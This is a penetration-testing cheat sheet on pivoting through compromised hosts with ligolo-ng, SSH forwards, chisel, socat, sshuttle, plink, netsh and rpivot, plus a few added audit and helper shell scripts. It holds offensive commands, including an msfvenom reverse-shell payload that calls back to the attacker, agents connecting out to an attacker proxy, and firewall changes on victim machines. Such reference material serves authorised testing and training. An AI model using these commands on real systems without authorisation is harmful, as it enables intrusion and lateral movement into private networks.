Pivoting / Forwarding

00. Basic Enumeration

## ------------------| Check the ARP table: hosts the pivot has talked to recently, a cheap hint at which subnets are reachable from it
arp -an

01. Port Forwarding (Ligolo-ng)

## ------------------| Agent [target/victim computer]
## Connects back to the proxy on 11601; -ignore-cert because the proxy below runs with a self-signed cert
.\agent.exe -connect <MyIP>:11601 -ignore-cert

## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
## Inside the ligolo-ng prompt: pick the agent session, list the agent's interfaces to learn the internal subnet
session
ifconfig
## In another shell, route that subnet through the tun interface, then start the tunnel in the prompt
sudo ip route add <IPRange>/24 dev ligolo
start
## Traffic to <IPRange> now goes through the agent at the IP layer, so nmap works without proxychains
nmap <IP>

01.1 SSH Port Forward

##  -N   Do not execute a remote command.  This is useful for just forwarding ports.
##  ~C   Escape to the "ssh>" command line inside a running session to add -L/-R/-D forwards;
##       type it right after pressing Enter, the escape is only recognised at the start of a line
~C

## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>

## 3306 is the port on the SSH server (the victim), 1337 is the port opened on our machine (127.0.0.1:1337)
ssh> -L 1337:127.0.0.1:3306
ssh -N -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
## Opens <remote_port> on the SSH server and sends it to <remote_ip>:<host_port> as seen from the SSH client
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>

## Here the SSH client runs on the victim and the SSH server is our machine (same idea as plink below):
## 3306 is the victim's local port, 1337 is the listener opened on our machine (bound to 127.0.0.1 unless our sshd has GatewayPorts yes)
ssh -N -R 1337:127.0.0.1:3306 <user>@<our_ip>

## ------------------| Dynamic Port Forward (SOCKS proxy, used with proxychains)
ssh> -D 1080

## Config proxychains: 1080 is the SOCKS listener on our machine
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>    # -f: go to background after authentication
## Launch nmap: only full TCP connects go through SOCKS, hence -sT; -Pn because ICMP ping does not
proxychains nmap -sT -Pn 172.16.1.0/24

01.2 Socat Multipurpose relay

## Run on the pivot. Listen on 4444 (all interfaces) and relay each connection to the local CUPS port 631;
## anything that can reach 4444 can use the relay
socat TCP-LISTEN:4444,fork,reuseaddr TCP:127.0.0.1:631
## Listen only on the given interface address and relay to the local MySQL port
socat TCP-LISTEN:4444,fork,reuseaddr,bind=10.10.14.26 TCP:127.0.0.1:3306

01.3 Using Chisel

## ------------------| Normal (reverse port forward)
## Server side (our machine); --reverse lets clients open R: listeners here
./chisel server --reverse --port 1234
## Client side (pivot): its local 3000/3001 become 3000/3001 on our machine
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001

## ------------------| SOCKS5 (With Proxychains)
## Server side
./chisel server --reverse --port 1234
## Client side: starts a SOCKS5 listener on our machine, port 1080, that exits through the client.
## 0.0.0.0 binds it on every interface of our machine; use R:127.0.0.1:1080:socks to keep it loopback-only
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf
socks5   127.0.0.1   1080
## Use nmap with proxychains (TCP connect scan, no ping)
proxychains nmap -sT -Pn <IP>
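The socat `bind=` relay in 01.2 and the chisel `R:0.0.0.0:1080:socks` listener above both open ports on non-loopback addresses, which means the whole network segment can use the pivot, not just us. The script below is an added example (not code from the page, nor from the socat or chisel projects) that audits that: it reads `ss -ltn` output and reports every listener not bound to loopback, and checks that a given port is loopback-only. The function names and the `SAMPLE_SS` text are made up for the demo; feed it `ss -ltn | exposed_listeners` on a real host.

```sh
#!/bin/sh
# Audit which listening sockets a pivot host exposes beyond loopback.
# Input is `ss -ltn` text on stdin; nothing here touches the network.

# Print "addr:port" for every LISTEN socket not bound to 127.x or [::1]
exposed_listeners() {
  awk '$1 == "LISTEN" {
      n = split($4, p, ":"); port = p[n]                 # port is the last ":"-separated field, also for [::]:8989
      addr = substr($4, 1, length($4) - length(port) - 1)
      if (addr ~ /^127\./ || addr == "[::1]") next
      print addr ":" port
  }'
}

# require_loopback PORT: succeed only if PORT is listening and every socket on it is loopback-bound
require_loopback() {
  awk -v want="$1" '
      $1 == "LISTEN" {
          n = split($4, p, ":"); port = p[n]
          if (port != want) next
          seen = 1
          addr = substr($4, 1, length($4) - length(port) - 1)
          if (!(addr ~ /^127\./ || addr == "[::1]")) bad = 1
      }
      END { ok = seen && !bad; exit ok ? 0 : 1 }'
}

# Constructed sample in the shape of `ss -ltn` output (not captured from a real host)
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN 0      128    127.0.0.1:1080       0.0.0.0:*
LISTEN 0      128    0.0.0.0:1080         0.0.0.0:*
LISTEN 0      128    10.10.14.26:4444     0.0.0.0:*
LISTEN 0      128    [::1]:1337           [::]:*
LISTEN 0      128    [::]:8989            [::]:*
LISTEN 0      128    127.0.0.1:22         0.0.0.0:*'

echo "listeners reachable from the network:"
printf '%s\n' "$SAMPLE_SS" | exposed_listeners
for port in 1080 1337 22; do
  if printf '%s\n' "$SAMPLE_SS" | require_loopback "$port"; then
    echo "port $port: loopback only"
  else
    echo "port $port: exposed or not listening"
  fi
done
```

Port 1080 fails the check even though a `127.0.0.1:1080` socket exists, because a second socket on `0.0.0.0:1080` makes the same port reachable from outside. On a Windows pivot (netsh portproxy, 01.8) the equivalent data comes from `netstat -ano`.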

01.4 Using sshuttle

## ------------------| For all routes (0/0 is shorthand for 0.0.0.0/0; sshuttle excludes the pivot's own address automatically)
sudo sshuttle -vvr root@10.10.110.100 0/0
sudo sshuttle -vr root@10.10.110.100 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
## Note: 0.0.0.0/24 is NOT "everything", it only covers 0.0.0.0-0.0.0.255; the prefix length is what matters

## ------------------| For specific route
sudo sshuttle -vr root@10.10.110.100 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
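Whether sshuttle, `ip route add ... dev ligolo` (01) or Metasploit's `route add` (01.11) carries traffic to a host depends entirely on the CIDR you give it, and shorthand like `0/0` versus a mistyped `0.0.0.0/24` is easy to confuse. The following is an added example (not from the page or from sshuttle) that expands sshuttle-style shorthand, prints the address range a CIDR really covers, and checks whether a target falls inside it. Function names are made up; it uses only shell arithmetic and needs no network.

```sh
#!/bin/sh
# CIDR sanity checks for pivot routes. Pure POSIX shell arithmetic (64-bit shells assumed).

# dotted quad -> 32-bit integer
ip_to_int() {
  set -- $(printf '%s' "$1" | tr . ' ')
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# 32-bit integer -> dotted quad
int_to_ip() {
  echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# Expand sshuttle-style shorthand: 0/0 -> 0.0.0.0/0, 10.10/16 -> 10.10.0.0/16, bare host -> /32
expand_cidr() {
  ip=${1%/*}; bits=${1#*/}
  [ "$ip" = "$1" ] && bits=32
  case "$ip" in
    *.*.*.*) ;;
    *.*.*)   ip="$ip.0" ;;
    *.*)     ip="$ip.0.0" ;;
    *)       ip="$ip.0.0.0" ;;
  esac
  echo "$ip/$bits"
}

# netmask as an integer for a prefix length; built without shifting past 32 bits
prefix_mask() {
  echo $(( ((1 << $1) - 1) << (32 - $1) ))
}

# cidr_range CIDR: print "first-last (N addresses)"
cidr_range() {
  c=$(expand_cidr "$1"); ip=${c%/*}; bits=${c#*/}
  [ "$bits" -ge 0 ] && [ "$bits" -le 32 ] || { echo "bad prefix length: $1" >&2; return 2; }
  mask=$(prefix_mask "$bits")
  net=$(( $(ip_to_int "$ip") & mask ))
  last=$(( net | (mask ^ 4294967295) ))          # 4294967295 = 0xFFFFFFFF
  echo "$(int_to_ip "$net")-$(int_to_ip "$last") ($(( 1 << (32 - bits) )) addresses)"
}

# route_covers CIDR HOST: succeed if HOST is inside CIDR, i.e. the route will carry traffic to it
route_covers() {
  c=$(expand_cidr "$1"); ip=${c%/*}; bits=${c#*/}
  mask=$(prefix_mask "$bits")
  [ $(( $(ip_to_int "$ip") & mask )) -eq $(( $(ip_to_int "$2") & mask )) ]
}

for r in 0/0 0.0.0.0/24 172.16.1.0/24 10.10.110.100/24; do
  printf '%-16s %s\n' "$r" "$(cidr_range "$r")"
done
for r in 0/0 0.0.0.0/24 172.16.1.0/24; do
  if route_covers "$r" 172.16.1.55; then echo "$r covers 172.16.1.55"; else echo "$r does NOT cover 172.16.1.55"; fi
done
```

Run `route_covers <CIDR> <target>` before starting sshuttle with the same argument; if it fails, the target's traffic will not enter the tunnel at all. Addresses with leading zeros (e.g. `010.0.0.1`) are not handled, since the shell would read them as octal.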

01.5 Using ncat tunnel

## ------------------| On the pivot machine: ncat as an HTTP CONNECT proxy on 1337
## It is unauthenticated, so anyone who can reach 1337 can relay through the pivot; add --allow <AttackerIP> to restrict it
ncat -vv --listen 1337 --proxy-type http

## ------------------| On the attacker machine (10.10.110.100 is the pivot running ncat)
## printf rather than echo: plain echo does not expand \t in every shell, and the entry must land in [ProxyList] (the last section)
printf 'http\t10.10.110.100\t1337\n' >> /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf

## ------------------| Then use proxychains
proxychains nmap -sT -Pn 172.16.1.0/24
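The `[ProxyList]` entries added for SSH `-D` (01.1), chisel (01.3) and ncat above are all appended by hand, and with `strict_chain` every uncommented line becomes a hop in sequence, so a stale or duplicated entry silently routes traffic through the wrong pivot or through the same one twice. The helper below is an added example (not from the page or the proxychains project) that validates the type and port, refuses duplicates, writes real tabs with printf, and prints the resulting chain. The function names and the sample config it builds are made up for the demo.

```sh
#!/bin/sh
# Safe edits to a proxychains.conf [ProxyList].

# add_proxy_entry CONF TYPE HOST PORT
#   appends "TYPE<tab>HOST<tab>PORT" after checking TYPE and PORT and refusing duplicates
add_proxy_entry() {
  conf=$1 type=$2 host=$3 port=$4
  case "$type" in
    http|socks4|socks5) ;;
    *) echo "unsupported proxy type: $type" >&2; return 2 ;;
  esac
  case "$port" in
    ''|*[!0-9]*) echo "port must be numeric: $port" >&2; return 2 ;;
  esac
  [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || { echo "port out of range: $port" >&2; return 2; }
  grep -q '^\[ProxyList\]' "$conf" || { echo "no [ProxyList] section in $conf" >&2; return 2; }
  host_re=$(printf '%s' "$host" | sed 's/\./\\./g')     # dots in HOST are literal in the duplicate check
  if grep -Eq "^[[:space:]]*$type[[:space:]]+$host_re[[:space:]]+$port([[:space:]]|\$)" "$conf"; then
    echo "already present: $type $host $port" >&2
    return 1
  fi
  printf '%s\t%s\t%s\n' "$type" "$host" "$port" >> "$conf"
}

# proxy_chain CONF: print the active hops in the order proxychains will use them
proxy_chain() {
  sed -n '/^\[ProxyList\]/,$p' "$1" | grep -E '^[[:space:]]*(http|socks4|socks5)[[:space:]]'
}

# Demo on a constructed config (not copied from a real host)
CONF=$(mktemp)
{
  printf 'strict_chain\nproxy_dns\n[ProxyList]\n'
  printf 'socks5\t127.0.0.1\t1080\n'
} > "$CONF"
add_proxy_entry "$CONF" http 10.10.110.100 1337
if ! add_proxy_entry "$CONF" http 10.10.110.100 1337; then
  echo "duplicate rejected, chain unchanged"
fi
echo "active chain:"
proxy_chain "$CONF"
rm -f "$CONF"
```

Because the duplicate check is not a "switch", swapping pivots still means commenting out the old line; `proxy_chain /etc/proxychains.conf` shows what will actually be chained before you run nmap through it.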

01.6 Using httptunnel

## ------------------| On the compromised host (server): expose its local 3306 wrapped in HTTP on port 1337
hts --forward-port localhost:3306 1337

## ------------------| On our machine (client): local port 3306 now reaches the compromised host's 3306 through the HTTP tunnel
htc --forward-port 3306 <compromised_ip>:1337

01.7 Using Plink.exe

cp /usr/share/windows-resources/binaries/plink.exe .

## Run on the victim: opens 445 on our machine (loopback) and sends it to the victim's own 445 (SMB)
.\plink.exe root@<OURIP> -R 445:127.0.0.1:445

## Non-interactive: accept our host key, password login, expose the victim's 3306 as 1337 on our side.
## Binding the listener to <our_ip> (instead of plain -R 1337:...) needs GatewayPorts yes in our sshd_config.
## The credentials end up in the victim's process list and history, so use a throwaway account on our box.
cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.0.1:3306 <our_ip>

01.8 Using netsh.exe

## Run as Administrator on the compromised Windows host (portproxy relies on the "IP Helper" service, iphlpsvc)
## 3306 is the port on the remote target, 1337 is the listener opened on the compromised machine
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>
## Verify with: netsh interface portproxy show all   (and delete v4tov4 listenport=1337 listenaddress=<compromised_ip> to clean up)

## Add firewall rule for the same listener port (1337)
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=1337 action=allow

01.9 Using rinetd

## ------------------| Relay port 80 on our machine to google.com, for a restricted host that can reach us but not the internet
sudo vi /etc/rinetd.conf
### Rules are "bindaddress bindport connectaddress connectport"; add after the commented examples (around line 19)
0.0.0.0    80    <GoogleIPAddress>    80
### Restart service
sudo service rinetd restart

### Success? (on the restricted machine)
nc -znv <AttackerIP> 80

01.10 Using rpivot.exe [Best for Windows XP]

## ------------------| Start server on attacker machine (the SOCKS listener defaults to 127.0.0.1:1080, see --proxy-port)
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989

## ------------------| Start rpivot on compromised machine (fetch client.exe on the attacker box, then transfer it)
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989

## ------------------| Proxy (rpivot speaks SOCKS4, so the proxychains entry must be socks4, not socks5)
/etc/proxychains.conf
socks4	127.0.0.1	1080
proxychains nmap -sT -Pn -p 80 <IP>

01.11 Using Metasploit with Meterpreter

## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin

## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i <session_id>

## ------------------| Method 0x01: route a subnet through the session, then expose a SOCKS proxy on our machine
route add <Compromised_Subnet>/24 <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
## 'route print' shows the table; only routed subnets are reachable through the proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run -j

## ------------------| Method 0x02: a single port forward
## !! You must be on " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
    ## -l 8003        port opened on our machine (127.0.0.1:8003)
    ## -r 172.17.0.2  target host, reached through the session
    ## -p 3306        port on that target host
    ## then you can use 127.0.0.1:8003 from your end
